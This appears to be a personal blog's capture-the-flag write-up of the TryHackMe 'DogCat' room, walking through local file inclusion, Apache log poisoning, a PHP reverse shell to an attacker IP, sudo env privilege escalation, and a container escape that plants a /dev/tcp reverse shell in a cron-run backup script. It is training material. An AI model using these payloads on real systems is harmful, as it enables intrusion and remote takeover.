<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="prefer-datetime-locale" content="en"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="DogCat TryHackMe – Writeup" /><meta property="og:locale" content="en" /><meta name="description" content="Exporting the ip, hate typing it over again. import ip=10.10.106.83" /><meta property="og:description" content="Exporting the ip, hate typing it over again. import ip=10.10.106.83" /><link rel="canonical" href="https://abuyusif01.github.io/posts/tryhackme-dogcat/" /><meta property="og:url" content="https://abuyusif01.github.io/posts/tryhackme-dogcat/" /><meta property="og:site_name" content="Abuyusif01" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-04-06T00:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="DogCat TryHackMe – Writeup" /><meta name="twitter:site" content="@abuyusif01" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-05-22T00:01:57+08:00","datePublished":"2022-04-06T00:00:00+08:00","description":"Exporting the ip, hate typing it over again. import ip=10.10.106.83","headline":"DogCat TryHackMe – Writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://abuyusif01.github.io/posts/tryhackme-dogcat/"},"url":"https://abuyusif01.github.io/posts/tryhackme-dogcat/"}</script><title>DogCat TryHackMe -- Writeup | Abuyusif01</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Abuyusif01"><meta name="application-name" content="Abuyusif01"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/hero.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Abuyusif01</a></div><div class="site-subtitle font-italic">I love tinkering around with computers, definitely not a hacker.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/abuyusif01" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/abuyusif01" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['abuyusif01','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>DogCat TryHackMe -- Writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>DogCat TryHackMe -- Writeup</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/abuyusif01">Abubakar Abubakar Yusif</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1649174400" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-04-06 </em> </span> <span> Updated <em class="timeago" data-ts="1653148917" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-05-22 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="577 words"> <em>3 min</em> read</span></div></div></div><div class="post-content"><p>Exporting the ip, hate typing it over again. <code class="language-plaintext highlighter-rouge">import ip=10.10.106.83</code></p><h3 id="enumeration"><span class="mr-2">Enumeration</span><a href="#enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>We got 2 open port, 22(ssh), 80(apache). fair enough lets see whats in 80</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre>PORT   STATE SERVICE
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 <span class="o">(</span>RSA<span class="o">)</span>
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 <span class="o">(</span>EdDSA<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.38 <span class="o">((</span>Debian<span class="o">))</span>
|_http-server-header: Apache/2.4.38 <span class="o">(</span>Debian<span class="o">)</span>
|_http-title: dogcat
MAC Address: 02:B3:94:18:A1:5F <span class="o">(</span>Unknown<span class="o">)</span>
</pre></table></code></div></div><p>navigating to <code class="language-plaintext highlighter-rouge">http://10.10.106.83</code> give us this page, where we can click at either cat/dog.<br /> <img data-src="/assets/img/tryhackme/dogcat/dogcat_landing.png" alt="img" data-proofer-ignore></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">cat</span>: http://10.10.106.83/?view<span class="o">=</span><span class="nb">cat
</span>dog: http://10.10.106.83/?view<span class="o">=</span>dog
</pre></table></code></div></div><p>Looking at <code class="language-plaintext highlighter-rouge">?view=..</code> The first thing come to my mind is Local file inclusion (LFI). so i try including dog: <code class="language-plaintext highlighter-rouge">http://10.10.106.83/?view=../../../../etc/passwd</code> but urgh it complains only dogs/cats pic allowed. So now what i need todo is essentially read the index.php file to see what happend under the hood. What i basically end up doing is converting the file to base64, parse it and then decode it to normal text.</p><p><code class="language-plaintext highlighter-rouge">"?view=php://filter/read=convert.base64-encode/resource=./dog/../index"</code></p><div class="language-php highlighter-rouge"><div class="code-header"> <span data-label-text="PHP"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre> <span class="cp">&lt;?php</span>
    <span class="k">function</span> <span class="n">containsStr</span><span class="p">(</span><span class="nv">$str</span><span class="p">,</span> <span class="nv">$substr</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nb">strpos</span><span class="p">(</span><span class="nv">$str</span><span class="p">,</span> <span class="nv">$substr</span><span class="p">)</span> <span class="o">!==</span> <span class="kc">false</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="nv">$ext</span> <span class="o">=</span> <span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"ext"</span><span class="p">])</span> <span class="o">?</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s2">"ext"</span><span class="p">]</span> <span class="o">:</span> <span class="s1">'.php'</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">]))</span> <span class="p">{</span>
        <span class="k">if</span><span class="p">(</span><span class="nf">containsStr</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">],</span> <span class="s1">'dog'</span><span class="p">)</span> <span class="o">||</span> <span class="nf">containsStr</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">],</span> <span class="s1">'cat'</span><span class="p">))</span> <span class="p">{</span>
            <span class="k">echo</span> <span class="s1">'Here you go!'</span><span class="p">;</span>
            <span class="k">include</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'view'</span><span class="p">]</span> <span class="mf">.</span> <span class="nv">$ext</span><span class="p">;</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">echo</span> <span class="s1">'Sorry, only dogs or cats are allowed.'</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="cp">?&gt;</span>
</pre></table></code></div></div><p>Looking at the source, we know exactly what todo now. I tried again to include passwd file now i modify it to <code class="language-plaintext highlighter-rouge">'http://10.10.106.83/?view=./cat/../../../../etc/passwd&amp;ext='</code></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<span class="nb">sync</span>:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
</pre></table></code></div></div><p>Now what next lmao. I can include files but still not enough. i need Remote code Execution (rce). A simple google search helped me out i found this <a href="https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1">link</a>. Next i try reading <code class="language-plaintext highlighter-rouge">/var/log/apache2/access.log</code> to see if i can use log poisoning. AND BOOM I CAN. Now only left is crafting payload to get a shell.</p><p>First request. this allow us to use the <code class="language-plaintext highlighter-rouge">cmd</code> parameter later to execute any php code.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>nc <span class="nv">$ip</span> 80
GET /&lt;?php system<span class="o">(</span><span class="nv">$_GET</span><span class="o">[</span><span class="s1">'cmd'</span><span class="o">])</span><span class="p">;</span>?&gt;
</pre></table></code></div></div><p>Next is searching php reverse shell, i use <a href="">this</a> onliner shell. then urlencode it.</p><div class="language-php highlighter-rouge"><div class="code-header"> <span data-label-text="PHP"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="n">php</span> <span class="o">-</span><span class="n">r</span> <span class="s1">'$sock=fsockopen("&lt;YOURIP&gt;",&lt;PORT&gt;);exec("/bin/bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span>
<span class="n">php</span><span class="o">%</span><span class="mi">20</span><span class="o">-</span><span class="n">r</span><span class="o">%</span><span class="mi">20</span><span class="o">%</span><span class="mi">27</span><span class="o">%</span><span class="mi">24</span><span class="n">sock</span><span class="o">%</span><span class="mi">3</span><span class="nf">Dfsockopen</span><span class="p">(</span><span class="o">%</span><span class="mi">22</span><span class="o">&lt;</span><span class="no">YOURIP</span><span class="o">&gt;%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="nc">C</span><span class="o">&lt;</span><span class="no">PORT</span><span class="o">&gt;</span><span class="p">)</span><span class="o">%</span><span class="mi">3</span><span class="nf">Bexec</span><span class="p">(</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="nc">Fbin</span><span class="o">%</span><span class="mi">2</span><span class="nc">Fbash</span><span class="o">%</span><span class="mi">20</span><span class="o">-</span><span class="n">i</span><span class="o">%</span><span class="mi">20</span><span class="o">%</span><span class="mi">3</span><span class="nc">C</span><span class="o">%</span><span class="mi">263</span><span class="o">%</span><span class="mi">20</span><span class="o">%</span><span class="mi">3</span><span class="nc">E</span><span class="o">%</span><span class="mi">263</span><span class="o">%</span><span class="mi">202</span><span class="o">%</span><span class="mi">3</span><span class="nc">E</span><span class="o">%</span><span class="mi">263</span><span class="o">%</span><span class="mi">22</span><span class="p">)</span><span class="o">%</span><span class="mi">3</span><span class="nc">B</span><span class="o">%</span><span class="mi">27</span>
</pre></table></code></div></div><p>Final payload</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://10.10.156.55/?view=./cat/../../../../var/log/apache2/access.log&amp;ext=&amp;cmd=php%20-r%20%27%24sock%3Dfsockopen(%2210.10.39.132%22%2C4444)%3Bexec(%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27
</pre></table></code></div></div><h3 id="searching-for-flags"><span class="mr-2">Searching for flags.</span><a href="#searching-for-flags" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>flag1: can be found /var/www/html/flag.php THM<span class="o">{</span>Th1s_1s_N0t_4_Catdog_<span class="k">*********</span><span class="o">}</span>
flag2: can be found /var/www HM<span class="o">{</span>LF1_t0_RC3_<span class="k">******</span><span class="o">}</span>
</pre></table></code></div></div><h3 id="priv-esc"><span class="mr-2">priv esc</span><a href="#priv-esc" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>User www-data may run the following commands on 005c9764143d:
    (root) NOPASSWD: /usr/bin/env
</pre></table></code></div></div><p>Well, thats kinda ez priv esc. <code class="language-plaintext highlighter-rouge">sudo /usr/bin/env /bin/bash -p</code> Now we root <br /><code class="language-plaintext highlighter-rouge">flag3: can be found /root/ THM{D1ff3r3nt_3nv1ronments_*******}</code></p><p>what… so where tf is flag4?.</p><h3 id="escaping-container"><span class="mr-2">escaping container</span><a href="#escaping-container" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>So i figure it out, we’re inside a container. Now our job is to somehow runaway from here. Looking at the backup files in /opt/backup i notice something. the file backup.sh is older than backup.tar <code class="language-plaintext highlighter-rouge">probably some cron job on the host running the script</code> so what i did is replace the backup.sh content with a reverse shell hoping that the cron job run it. So i can get a shell on the host.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s1">'#!/bin/bash'</span> <span class="o">&gt;</span> backup.sh
<span class="nb">echo</span> <span class="s1">'/bin/bash -i &gt;&amp; /dev/tcp/10.10.39.132/4445 0&gt;&amp;1'</span> <span class="o">&gt;&gt;</span> backup.sh
<span class="nb">chmod</span> +x backup.sh

attacker: nc <span class="nt">-nlvp</span> 4445
</pre></table></code></div></div><p>Oh nice it works<br /> <code class="language-plaintext highlighter-rouge">flag4: THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_**************************}</code></p><p>thanks for reading, i hope this helps :)</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/tryhackme/'>TryHackMe</a>, <a href='/categories/medium/'>Medium</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/docker/" class="post-tag no-text-decoration" >docker</a> <a href="/tags/priv-esc/" class="post-tag no-text-decoration" >priv-esc</a> <a href="/tags/linux/" class="post-tag no-text-decoration" >linux</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/tags/lfi/" class="post-tag no-text-decoration" >lfi</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=DogCat TryHackMe -- Writeup - Abuyusif01&amp;url=https://abuyusif01.github.io/posts/tryhackme-dogcat/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=DogCat TryHackMe -- Writeup - Abuyusif01&amp;u=https://abuyusif01.github.io/posts/tryhackme-dogcat/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://abuyusif01.github.io/posts/tryhackme-dogcat/&amp;text=DogCat TryHackMe -- Writeup - Abuyusif01" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/tryhackme-biblioteca/">biblioteca TryHackMe -- Writeup</a><li><a href="/posts/tryhackme-dogcat/">DogCat TryHackMe -- Writeup</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/mis-config/">mis-config</a> <a class="post-tag" href="/tags/exploit-db/">exploit-db</a> <a class="post-tag" href="/tags/priv-esc/">priv-esc</a> <a class="post-tag" href="/tags/crypto/">crypto</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/active-directory/">active-directory</a> <a class="post-tag" href="/tags/binary/">binary</a> <a class="post-tag" href="/tags/cms/">cms</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/sig21ctf-linux/"><div class="card-body"> <em class="timeago small" data-ts="1642262400" > 2022-01-16 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Linux Sig21CTF IIUM</h3><div class="text-muted small"><p> Linux Sig21CTF Flag 1. nc localhost 1337 ls -lah drwxr-xr-x 1 linuxuser linuxuser 4.0K Mar 31 05:32 . drwxr-xr-x 1 root root 4.0K Mar 31 05:31 .. -rw-r--r-- 1 linuxuser linuxuser 220 ...</p></div></div></a></div><div class="card"> <a href="/posts/sig21ctf-linux-web/"><div class="card-body"> <em class="timeago small" data-ts="1641830400" > 2022-01-11 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Web Linux Sig21CTF IIUM</h3><div class="text-muted small"><p> Web Linux Sig21CTF Flag 1. navigating to http://sig21ctf:3000 we got this login page. From the question hint, we knew that the backend database is mysql. The first thing i think of is SQL-Injecti...</p></div></div></a></div><div class="card"> <a href="/posts/tryhackme-tomghost/"><div class="card-body"> <em class="timeago small" data-ts="1646323200" > 2022-03-04 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>TryHackMe GhostCat -- Writeup</h3><div class="text-muted small"><p> export ip=10.10.2.234 nmap basic nmap $ip PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 8009/tcp open ajp13 8080/tcp open http-proxy MAC Address: 02:D6:2B:FE:BC:A9 (Unknown) ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/tryhackme-active-directory/" class="btn btn-outline-primary" prompt="Older"><p>Introduction To Windows Active Directy</p></a> <a href="/posts/tryhackme-biblioteca/" class="btn btn-outline-primary" prompt="Newer"><p>biblioteca TryHackMe -- Writeup</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/abuyusif01">Abubakar Abubakar Yusif</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/mis-config/">mis-config</a> <a class="post-tag" href="/tags/exploit-db/">exploit-db</a> <a class="post-tag" href="/tags/priv-esc/">priv-esc</a> <a class="post-tag" href="/tags/crypto/">crypto</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/active-directory/">active-directory</a> <a class="post-tag" href="/tags/binary/">binary</a> <a class="post-tag" href="/tags/cms/">cms</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 